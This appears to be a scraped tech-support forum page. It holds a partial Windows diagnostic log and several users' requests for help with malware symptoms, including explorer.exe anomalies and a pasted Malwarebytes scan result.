Error: (09/04/2014 07:49:17 PM) (Source: Application Error) (EventID: 1000) (User: )Description: nvstreamsvc.exe0.0.0.053e5680cnvstreamsvc.exe0.0.0.053e5680c4000001500000000002d6389ec801cfc88b204d3989C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exeC:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe7651211f-3496-11e4-8c64-60a44c65b479 Error: (09/04/2014 07:37:49 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Explorer.EXE6.1.7601.175674d672ee4SHELL32.dll6.1.7601.1851753aa2e07c0000005000000000005050678801cfc88b2125e65dC:\Windows\Explorer.EXEC:\Windows\system32\SHELL32.dlldc48b880-3494-11e4-8c64-60a44c65b479 CodeIntegrity Errors:=================================== Date: 2014-09-04 01:21:21.524 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.524 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.524 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\KLELAMX64\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\KLELAMX64\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-04 01:21:21.514 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\KLELAMX64\klelam.sys because the set of per-page image hashes could not be found on the system. Date: 2014-09-03 05:56:04.608 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core i7-4770K CPU @ 3.50GHzPercentage of memory in use: 9%Total physical RAM: 32705.79 MBAvailable physical RAM: 29691.33 MBTotal Pagefile: 40895.96 MBAvailable Pagefile: 37362.27 MBTotal Virtual: 8192 MBAvailable Virtual: 8191.82 MB ==================== Drives ================================ Drive c: (Windows 7) (Fixed) (Total:447.13 GB) (Free:393.85 GB) NTFS ==>[Drive with boot components (obtained from BCD)]Drive d: (dATa) (Fixed) (Total:3725.9 GB) (Free:3720.37 GB) NTFS ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or 8) (Size: 447.1 GB) (Disk ID: 7AEC82DA)Partition 1: (Active) - (Size=447.1 GB) - (Type=07 NTFS) ========================================================Disk: 1 (Size: 3726 GB) (Disk ID: C3C47305) Partition: GPT Partition Type. ==================== End Of Log ============================
  22. I have downloaded countless virus and malware programs trying to solve my problem. Malwarebytes has helped massively it got rid of a werfault.exe and constant dllhost.exe error messages and removed so much infected files from my laptop but it hasn't fixed one problem and that's my taskbar keeps restarting. I have searched for hours trying to find a solution but no help. Also to add my system restore is affected and I get a error message when opening it. I am on windows 8 and I have no restore point or anything. sfc/scannow finds a error but can not fix it I also keep receiving a notification from C:\Windows\explorer.exe from Malwarebytes
  23. Hi can someone tell me what is static:4003 and why explorer.exe is connecting to it? Also is this a sign of a malware infection? I tried google but no luck. I heard that Windows 8 use explorer to phone home but I'm still not sure what it's doing. If someone could help me that would be great.
  24. Hello, I've been struggling with some malware on my windows 7 home premium 64 bit home PC. About two weeks ago, I noticed something was wrong when the PC got really laggy and the cpu was pegged and RAM was full. After struggling into task manager, I found some sketchy processes, long story short some nasty .exe files hanging out in AppData that I used safe mode with command prompt to delete (havac.exe among them, if that rings a bell). I have all my files backed up, and have been going at this thing with malwarebytes and microsoft security essentials, as I don't know what else to do. Everything shows up clean now, but I'll get multiple explorer.exe processes running and using all my resources. Malwarebytes also informs me that explorer.exe is trying to access malicious web addresses. It changes almost every time, and I haven't written any of the addresses down. Bottom line, there's stuff still here making it hard for me to use my PC, and I don't know how else to attack it. I've read some about this kind of issue but descriptions and solutions vary so I figured I'd start fresh. I've also read about the security issues and vulnerability associated with this kind of thing, so I want to get this resolved asap. Thank-you in advance for all your help.
  25. I just performed a quick scan using the 'Malwarebytes Anti-Malware software's pro version. 12 malicious objects were detected at the end of the scan. Some of the supposedly malicious contents included system files such as 'explorer.exe' and 'iexplorer.exe'. Here is the log of the scan (my computer name has been removed for security reasons): Malwarebytes Anti-Malware (PRO) 1.75.0.1300www.malwarebytes.orgDatabase version: v2014.01.25.06Windows 8 x64 NTFSInternet Explorer 11.0.9600.16476Daksh Shah :: <removed by me> [administrator]Protection: Enabled25-01-2014 10:45:21MBAM-log-2014-01-25 (10-53-55).txtScan type: Quick scanScan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUMScan options disabled: P2PObjects scanned: 292356Time elapsed: 7 minute(s), 7 second(s)Memory Processes Detected: 1C:\Users\Daksh\Systeminfo\explorer.exe (Spyware.Password) -> 4368 -> No action taken.Memory Modules Detected: 0(No malicious items detected)Registry Keys Detected: 5HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EXPLORER.EXE (Spyware.Password) -> No action taken.HKCR\AppID\{38495740-0035-4471-851E-F5BBB86AB085} (PUP.Optional.DefaultTab.A) -> No action taken.HKCR\AppID\{72D89EBF-0C5D-4190-91FD-398E45F1D007} (PUP.Optional.DefaultTab.A) -> No action taken.HKCR\AppID\DefaultTabBHO.DLL (PUP.Optional.DefaultTab.A) -> No action taken.HKCU\Software\DataMngr (PUP.Optional.DataMngr.A) -> No action taken.Registry Values Detected: 2HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|Windows Explorer (Spyware.Password) -> Data: C:\Users\Daksh\Systeminfo\iexplorer.exe -> No action taken.HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|Windows Explorer (Spyware.Password) -> Data: C:\Users\Daksh\Systeminfo\iexplorer.exe -> No action taken.Registry Data Items Detected: 0(No malicious items detected)Folders Detected: 0(No malicious items detected)Files Detected: 7C:\Users\Daksh\Systeminfo\explorer.exe (Spyware.Password) -> No action taken.C:\Users\Daksh\Systeminfo\iexplorer.exe (Spyware.Password) -> No action taken.C:\Users\Daksh\AppData\Local\Temp\utt9312.tmp (PUP.Optional.OpenCandy) -> No action taken.C:\Users\Daksh\AppData\Local\Temp\uttE3CB.tmp (PUP.Optional.OpenCandy) -> No action taken.C:\Users\Daksh\Downloads\9DBB.tmp (PUP.Optional.GoForFiles.A) -> No action taken.C:\Users\Family\AppData\Local\Google\Chrome\User Data\Default\bprotector web data (PUP.Optional.BProtector.A) -> No action taken.C:\Users\Family\AppData\Local\Google\Chrome\User Data\Default\bprotectorpreferences (PUP.Optional.BProtector.A) -> No action taken.(end)Kindly advice at the earliest whether I should remove all the malware detected above or only some of them. Will it be safe to do so?
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.